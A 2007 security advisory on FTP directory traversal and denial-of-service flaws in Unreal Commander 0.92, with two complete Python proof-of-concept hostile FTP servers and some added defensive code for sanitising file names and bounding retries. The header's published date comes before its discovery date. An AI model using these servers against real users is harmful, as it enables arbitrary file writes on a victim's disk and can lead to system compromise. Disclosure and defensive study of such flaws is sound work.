
Topic : X-Diesel Unreal Commander v0.92 (build 573) multiple FTP-based vulnerabilities

SecurityAlert : 3125
CVE : CVE-2007-4844
CVE : CVE-2007-4843
SecurityRisk : Medium
Remote Exploit : Yes
Local Exploit : No
Exploit Available : Yes
Credit : Gynvael Coldwind
Published : 13.09.2007

Affected Software : X-Diesel Unreal Commander v0.92 (build 573)

Advisory Content :

HISPASEC
Security Advisory
http://blog.hispasec.com/lab/

Name : 2K7SEPT6 X-Diesel Unreal Commander v0.92 (build 573)
multiple FTP-based vulnerabilities
Class : Remote directory traversal, Remote DoS
Threat level : HIGH
Discovered : 2007-09-06
Published : 2007-08-24
Credit : Gynvael Coldwind
Vulnerable : 0.92 (build 573), 0.92 (build 565), prior also may be affected

== Abstract ==

Unreal Commander is an award winning freeware file manager for Windows
98/ME/2000/XP/2003/Vista. The application supports multiple archive
formats, has a built-in FTP client, and other features.

Unreal Commander fails to correctly handle a malformed file name while
downloading a remote file from a malformed FTP server to a local hard drive.
This allows an attacker to perform a directory traversal attack. Successful
exploitation may lead to a full scale system compromise.

Unreal Commander also fails to correctly handle FTP responses. This can lead
to the application entering an infinite loop, denying service to the
legitimate user.

== Details ==

1. Remote FTP Directory Traversal
The FTP feature fails to correctly check the name of a file that is to be
downloaded. This filename can contain backslashes and dots, and these dots
and backslashes will be used as a part of the local file name.
An example file list entry sent from the FTP server can look like this:
-rwxr-xr-x 2 ftp ftp 4096 Aug 1 02:28 st\..\..\..\..\..\BackSlashPoC
When the user chooses to download the file (or a directory in which this
file exists), Unreal Commander will try to create the file on the local
hard drive using the dots and backslashes as a part of the name.
Since enough "\.." components will bring the path to the disk root, the
attacker can choose any location on the disk to write the file to. The file
can for example overwrite a critical system file, or create a file in the
Autostart folder.

See Proof of Concept exploit at the bottom of this advisory.

2. Remote FTP DoS
When connecting to a malformed FTP server, Unreal Commander sends a "CWD /"
command. If the malformed server replies with a "550 CWD Operation not
permitted" message, Unreal Commander tries to resend the command. The loop
continues until the remote FTP server answers with a message saying the
operation was successful.
If the remote FTP server disconnects while Unreal Commander is still in the
CWD loop, Unreal Commander will remain in the loop.
Unreal Commander does not react to Cancel/ALT+F4/ESC commands from the user;
the only way to exit the loop is to terminate the application.

See Proof of Concept exploit at the bottom of this advisory.
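A client-side CWD handler with the retry bound and disconnect check that the loop described above lacks, added here as an example (not code from the advisory or from Unreal Commander); the send/recv callables and the scripted reply lists are constructed stand-ins for a real control connection:

```python
# Added example, not part of the advisory. The vulnerable behaviour re-sends
# "CWD /" on every 550 reply and keeps looping after the server goes away.
# This version caps the retries, treats an empty read (socket EOF) as a
# disconnect, and does not retry permanent (5xx) errors at all.

class FtpSessionClosed(Exception):
    """Raised when the control connection returns EOF mid-command."""

def cwd_with_retry(send, recv, path="/", max_retries=3):
    """Issue CWD <path>; return True on a 2xx reply, False when giving up.

    send(line) writes one control line; recv() returns the next reply line,
    or "" once the server has disconnected (the same convention as socket
    recv() returning an empty string).
    """
    for attempt in range(max_retries + 1):
        send("CWD %s\r\n" % path)
        reply = recv()
        if reply == "":
            raise FtpSessionClosed("server closed the control connection")
        code = reply[:3]
        if code.startswith("2"):
            return True
        if code.startswith("4") and attempt < max_retries:
            continue          # 4xx = transient, worth one more try
        return False          # 5xx is permanent: stop instead of looping

def run_scripted(replies, **kw):
    """Drive cwd_with_retry() with a constructed list of server reply lines.

    Returns (result, number_of_CWD_commands_sent); result is "closed" when
    the scripted server disconnected (list exhausted) before answering.
    """
    sent = []
    it = iter(replies)
    def send(line):
        sent.append(line)
    def recv():
        return next(it, "")   # "" once the list is exhausted = disconnect
    try:
        result = cwd_with_retry(send, recv, **kw)
    except FtpSessionClosed:
        result = "closed"
    return result, len(sent)
```

With the advisory's reply ("550 CWD: Operation not permitted") the handler sends exactly one CWD and gives up, and an abrupt disconnect surfaces as an exception instead of a spin.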

== Vendor status and solution ==

The vendor has been informed, but has not yet released a proper patch.

The solution is to check the file names of each file being downloaded from
a remote unknown FTP server.
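A check of the kind the solution above calls for, covering the listing entry described in section 1, added here as an example in Python 3 (not code from the advisory or from Unreal Commander): the name is taken from a LIST line, treated as a single path component, rejected if it carries either separator or a dot-only component, and finally checked for containment after the path is resolved.

```python
import os

class UnsafeRemoteName(ValueError):
    """A server-supplied file name that must not be used for a local path."""

def name_from_list_line(line):
    """Return the file name from one UNIX-style LIST line, or None.

    The name is the 9th whitespace-separated field and may itself contain
    spaces, so split at most 8 times (assumption: "ls -l" style lines, the
    format the advisory's PoC server sends).
    """
    fields = line.rstrip("\r\n").split(None, 8)
    return fields[8] if len(fields) == 9 else None

def safe_local_path(download_dir, remote_name):
    """Return the local path for remote_name, or raise UnsafeRemoteName.

    An untrusted name is treated as exactly one path component: neither "/"
    nor "\\" may appear in it (on Windows both are separators, which is what
    the listing entry in the advisory relies on), it may not be "." or "..",
    and the joined path must still resolve to a location under download_dir.
    """
    if not remote_name or remote_name in (".", ".."):
        raise UnsafeRemoteName("empty or dot-only name")
    if "/" in remote_name or "\\" in remote_name or "\x00" in remote_name:
        raise UnsafeRemoteName("separator or NUL in name: %r" % remote_name)
    base = os.path.realpath(download_dir)
    target = os.path.realpath(os.path.join(base, remote_name))
    # Second line of defence: refuse anything that resolves outside base even
    # if the textual checks above were somehow bypassed.
    if os.path.commonpath([base, target]) != base:
        raise UnsafeRemoteName("resolves outside download dir: %r" % target)
    return target

def is_safe(download_dir, remote_name):
    """True when remote_name may be written below download_dir."""
    try:
        safe_local_path(download_dir, remote_name)
        return True
    except UnsafeRemoteName:
        return False
```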

== Proof of Concept - Remote FTP Directory Traversal ==
# python FTP
# by Gynvael Coldwind
# Python 2 script ("print" statements, str-based sockets). FTP replies end
# in CRLF ("\r\n"). The control channel listens on 127.0.0.1:2021 and the
# PASV data channel on 127.0.0.1:2570 (10 * 256 + 10).
import socket

TransferSock = 0

def sendDirList (sock):
    (DataSock, Address) = TransferSock.accept()
    print "sendDirList: TransferSock accepted a connection"
    sock.send("150 Opening ASCII mode data connection for file list\r\n")
    # The file name in the listing carries backslashes and dots, which the
    # vulnerable client uses verbatim when building the local path.
    DataSock.send("-rwxr-xr-x 2 ftp ftp 4096 Aug 1 02:28 "
                  "st\\..\\..\\..\\..\\..\\..\\BackSlashPoC\n")
    DataSock.close()
    sock.send("226 Transfer complete.\r\n")
    print "sendDirList: Transfer complete"

def sendFile (sock):
    (DataSock, Address) = TransferSock.accept()
    print "sendFile: TransferSock accepted a connection"
    sock.send("150 Opening BINARY mode data connection for sth (5 bytes)\r\n")
    DataSock.send("Proof of Concept - Remote FTP Client directory "
                  "traversal vulnerability (G.C. - Hispasec)")
    DataSock.close()
    sock.send("226 Transfer complete.\r\n")
    print "sendFile: Transfer complete"

def handleUSER (sock, cmd, argz): sock.send("331 Password required for user\r\n")
def handlePASS (sock, cmd, argz): sock.send("230 User logged in.\r\n")
def handleSYST (sock, cmd, argz): sock.send("215 UNIX Type: L8\r\n")
def handleFEAT (sock, cmd, argz): sock.send("211-Features:\r\n MDTM\r\n REST STREAM\r\n211 End\r\n")
def handleTYPE (sock, cmd, argz): sock.send("200 Type set to " + argz + "\r\n")
def handlePASV (sock, cmd, argz): sock.send("227 Entering Passive Mode (127,0,0,1,10,10)\r\n")
def handlePWD (sock, cmd, argz): sock.send("257 \"/\" is current directory.\r\n")
def handleCWD (sock, cmd, argz): sock.send("250 Requested file action okay, completed.\r\n")
def handleLIST (sock, cmd, argz): sendDirList(sock)
def handleQUIT (sock, cmd, argz):
    global end
    sock.send("Bye.\r\n")
    sock.close()
    end = 1   # leave the control loop instead of reading from a closed socket

def handleRETR (sock, cmd, argz):
    if argz == "/":
        sendDirList(sock)
    else:
        sendFile(sock)

def unknown (sock, cmd, argz): sock.send("550 " + cmd + ": Operation not permitted\r\n")

handlers = {
    'USER': handleUSER,
    'PASS': handlePASS,
    'SYST': handleSYST,
    'FEAT': handleFEAT,
    'TYPE': handleTYPE,
    'PASV': handlePASV,
    'PWD': handlePWD,
    'CWD': handleCWD,
    'LIST': handleLIST,
    'QUIT': handleQUIT,
    'RETR': handleRETR
}

ControlSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ControlSock.bind(("127.0.0.1", 2021))
ControlSock.listen(1)

TransferSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TransferSock.bind(("127.0.0.1", 10 * 256 + 10))
TransferSock.listen(10)

# Control Sock loop
(ClientSock, Address) = ControlSock.accept()
ClientSock.send("220 PoCFTPD 1.2.3.4 Server ready.\r\n")
end = 0

while not end:
    cmd = ClientSock.recv(1024)
    if not cmd:   # empty read: the client disconnected
        break
    print "Debug: recv -> " + cmd.strip()
    command = (cmd[0:4]).strip()
    argz = ((cmd.strip())[5:]).strip()
    handlers.get(command, unknown)(ClientSock, command, argz)

== Proof of Concept - Remote FTP DoS ==
# python FTP DoS
# by Gynvael Coldwind
# Python 2 script. No CWD handler is registered, so every "CWD /" the client
# sends is answered with the 550 reply from unknown(), which is what keeps
# the vulnerable client resending the command.
import socket

TransferSock = 0

def handleUSER (sock, cmd, argz): sock.send("331 Password required for user\r\n")
def handlePASS (sock, cmd, argz): sock.send("230 User logged in.\r\n")
def handleSYST (sock, cmd, argz): sock.send("215 UNIX Type: L8\r\n")
def handleFEAT (sock, cmd, argz): sock.send("211-Features:\r\n MDTM\r\n REST STREAM\r\n211 End\r\n")
def handleTYPE (sock, cmd, argz): sock.send("200 Type set to " + argz + "\r\n")
def handlePASV (sock, cmd, argz): sock.send("227 Entering Passive Mode (127,0,0,1,10,10)\r\n")
def handleQUIT (sock, cmd, argz):
    global end
    sock.send("Bye.\r\n")
    sock.close()
    end = 1   # leave the control loop instead of reading from a closed socket

def unknown (sock, cmd, argz):
    sock.send("550 " + cmd + ": Operation not permitted\r\n")
    print ("The Unreal Commander is now in an infinite loop. You may quit "
           "this exploit, the infinite loop will last.")

handlers = {
    'USER': handleUSER,
    'PASS': handlePASS,
    'SYST': handleSYST,
    'FEAT': handleFEAT,
    'TYPE': handleTYPE,
    'PASV': handlePASV,
    'QUIT': handleQUIT
}

ControlSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ControlSock.bind(("127.0.0.1", 2021))
ControlSock.listen(1)

TransferSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TransferSock.bind(("127.0.0.1", 10 * 256 + 10))
TransferSock.listen(10)

# Control Sock loop
(ClientSock, Address) = ControlSock.accept()
ClientSock.send("220 PoCFTPD 1.2.3.4 Server ready.\r\n")
end = 0

while not end:
    cmd = ClientSock.recv(1024)
    if not cmd:   # empty read: the client disconnected
        break
    print "Debug: recv -> " + cmd.strip()
    command = (cmd[0:4]).strip()
    argz = ((cmd.strip())[5:]).strip()
    handlers.get(command, unknown)(ClientSock, command, argz)

== Disclaimer ==
This document and all the information it contains is provided "as is",
without any warranty. Hispasec Sistemas is not responsible for the
misuse of the information provided in this advisory. The advisory is
provided for educational purposes only.

Permission is hereby granted to redistribute this advisory, providing
that no changes are made and that the copyright notices and
disclaimers remain intact.

Copyright (C) 2007 Hispasec Sistemas.

--
Gynvael Coldwind
mailto: michael AT hispasec DOT com
mailto: gynvael AT vexillium DOT org